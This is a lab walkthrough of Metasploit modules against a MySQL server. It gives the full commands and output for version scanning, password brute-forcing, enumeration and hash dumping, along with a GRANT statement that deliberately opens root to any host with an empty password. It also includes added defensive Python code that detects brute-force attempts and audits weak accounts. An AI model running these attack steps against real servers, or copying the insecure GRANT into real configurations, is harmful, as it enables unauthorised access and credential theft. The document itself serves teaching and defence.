Using auxiliary modules for service scanning, with the MySQL service as the example
Search for the available MySQL scanner modules
root@kali:~# msfconsole   # start msf
...
msf5 > search scanner/mysql   # list the available mysql scanner modules

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  No     MySQL Authentication Bypass Password Dump
   1  auxiliary/scanner/mysql/mysql_file_enum                             normal  No     MYSQL File/Directory Enumerator
   2  auxiliary/scanner/mysql/mysql_hashdump                              normal  No     MYSQL Password Hashdump
   3  auxiliary/scanner/mysql/mysql_login                                 normal  No     MySQL Login Utility
   4  auxiliary/scanner/mysql/mysql_schemadump                            normal  No     MYSQL Schema Dump
   5  auxiliary/scanner/mysql/mysql_version                               normal  No     MySQL Server Version Enumeration
   6  auxiliary/scanner/mysql/mysql_writable_dirs                         normal  No     MYSQL Directory Write Test
1. mysql_version: checks whether the database accepts remote connections; if it does, the version number is displayed
msf5 > use auxiliary/scanner/mysql/mysql_version   # use mysql_version to check whether the database accepts remote connections; if so, the version number is shown
msf5 auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.43.101
RHOSTS => 192.168.43.101
msf5 auxiliary(scanner/mysql/mysql_version) > run   # this result means mysql on the target does not accept remote connections
[*] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL, but responds with an error: \x04Host 'PCPZ8VZPNONCTTV' is not allowed to connect to this MySQL server
[*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To make testing easier, we can manually configure MySQL on the target machine to allow remote user connections.
mysql> grant all privileges on *.* to 'root'@'%' identified by '' with grant option;
mysql> flush privileges;
Now we run the module again, and the version number is displayed successfully.
msf5 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL 5.6.17 (protocol 10)
[*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2. mysql_login: brute force
If the database accepts remote connections, the password can be brute-forced.
This module ships no default wordlist, so a simple pass.txt was created for it.
msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.43.101
RHOSTS => 192.168.43.101
msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/pass.txt
msf5 auxiliary(scanner/mysql/mysql_login) > run   # the exploit command has the same effect
[+] 192.168.43.101:3306 - 192.168.43.101:3306 - Found remote MySQL version 5.6.17
[!] 192.168.43.101:3306 - No active DB -- Credential data will not be saved!
[-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:1 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
[-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:2 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
[-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:3 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
[-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:4 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
[-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:5 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
[+] 192.168.43.101:3306 - 192.168.43.101:3306 - Success: 'root:'
[*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The password was cracked successfully: it is empty.
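Every guess in the run above leaves an "Access denied for user 'root'@'<client>'" record on the server side, which is what a defender should be alerting on. The detector below is an added example, not part of the original post; it assumes the MySQL error log contains those lines (on 5.6 this requires log_warnings greater than 1), and the log excerpt is constructed.

```python
"""Flag MySQL brute-force attempts from 'Access denied' error-log lines.

Added example, not from the original post. Assumes the server error log
carries the same "Access denied for user 'u'@'h' (using password: X)"
message that mysql_login echoes per failed attempt. Sample lines are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

ACCESS_DENIED = re.compile(
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)


def parse_denials(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (user, client_host) for each access-denied line; others are skipped."""
    hits = []
    for line in lines:
        m = ACCESS_DENIED.search(line)
        if m:
            hits.append((m.group("user"), m.group("host")))
    return hits


def find_bruteforce(lines: Iterable[str], threshold: int = 5) -> Dict[Tuple[str, str], int]:
    """Map (user, client_host) -> failure count for pairs at or above threshold."""
    counts: Dict[Tuple[str, str], int] = defaultdict(int)
    for key in parse_denials(lines):
        counts[key] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


# Constructed 5.6-style error-log excerpt: five failed root guesses from one
# client (as in the walkthrough), one unrelated failure, and one non-auth line.
SAMPLE_LOG = [
    "200101 10:00:01 12 [Warning] Access denied for user 'root'@'192.168.43.100' (using password: YES)",
    "200101 10:00:01 12 [Warning] Access denied for user 'root'@'192.168.43.100' (using password: YES)",
    "200101 10:00:02 12 [Warning] Access denied for user 'root'@'192.168.43.100' (using password: YES)",
    "200101 10:00:02 12 [Warning] Access denied for user 'root'@'192.168.43.100' (using password: YES)",
    "200101 10:00:03 12 [Warning] Access denied for user 'root'@'192.168.43.100' (using password: YES)",
    "200101 10:00:04 13 [Warning] Access denied for user 'backup'@'10.0.0.7' (using password: NO)",
    "200101 10:00:05 14 [Note] Got an error reading communication packets",
]

if __name__ == "__main__":
    for (user, host), n in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force: {n} failed logins for {user!r} from {host}")
```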
3. mysql_enum: enumerate database information
msf5 > use auxiliary/admin/mysql/mysql_enum   # note that mysql_enum lives under the admin directory
msf5 auxiliary(admin/mysql/mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as

msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.43.101
RHOSTS => 192.168.43.101
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root   # the password is empty here, so it need not be set; if it is not empty, PASSWORD must be set as well
msf5 auxiliary(admin/mysql/mysql_enum) > run
...
(The enumerated information includes the MySQL version, operating system architecture, paths, password hashes and similar details.)
...
4. mysql_hashdump: dump password hashes
This module dumps the password hashes of the accounts that are visible under the privileges of the currently logged-in user, which makes it of somewhat limited use.
msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME                   no        The username to authenticate as

msf5 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 192.168.43.101
RHOSTS => 192.168.43.101
msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_hashdump) > run   # root's password is empty, so there is no hash here
[+] 192.168.43.101:3306 - Saving HashString as Loot: root:
[+] 192.168.43.101:3306 - Saving HashString as Loot: root:
[+] 192.168.43.101:3306 - Saving HashString as Loot: root:
[+] 192.168.43.101:3306 - Saving HashString as Loot: :
[+] 192.168.43.101:3306 - Saving HashString as Loot: root:
[*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
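The hashdump output makes the root cause visible: several root rows with no password hash, plus an anonymous account (the ": " entry), all created or exposed by the GRANT on 'root'@'%' earlier. The audit below is an added example, not part of the original post; it models mysql.user rows (user, host, hash) as constructed data and flags exactly those conditions, so it can be pointed at a real SELECT user, host, password FROM mysql.user result to catch them before a scanner does.

```python
"""Audit MySQL account rows for the weak settings this walkthrough relies on.

Added example, not from the original post. Flags an anonymous user, an empty
password hash, and login permitted from any host ('%') or a wildcard host
pattern. Sample rows are constructed to mirror the lab's hashdump output.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class MysqlAccount:
    user: str
    host: str
    password_hash: str  # mysql.user.password (5.6) / authentication_string (5.7+)


def audit_account(acct: MysqlAccount) -> List[str]:
    """Return findings for one row; an empty list means nothing to report."""
    findings = []
    if acct.user == "":
        findings.append("anonymous account")
    if acct.password_hash == "":
        findings.append("empty password")
    if acct.host == "%":
        findings.append("login allowed from any host")
    elif "%" in acct.host:
        findings.append(f"wildcard host pattern {acct.host!r}")
    return findings


def audit(accounts: List[MysqlAccount]) -> Dict[str, List[str]]:
    """Map 'user@host' -> findings for every row with at least one finding."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            report[f"{acct.user or '<anonymous>'}@{acct.host}"] = findings
    return report


# Constructed rows: the empty-password root entries and anonymous account seen in
# the hashdump output, the 'root'@'%' row added by the GRANT, and one sound account.
SAMPLE_ACCOUNTS = [
    MysqlAccount("root", "localhost", ""),
    MysqlAccount("root", "127.0.0.1", ""),
    MysqlAccount("root", "%", ""),
    MysqlAccount("", "localhost", ""),
    MysqlAccount("app", "10.0.0.5", "*CONSTRUCTED_HASH_PLACEHOLDER"),
]

if __name__ == "__main__":
    for account, findings in audit(SAMPLE_ACCOUNTS).items():
        print(account, "->", ", ".join(findings))
```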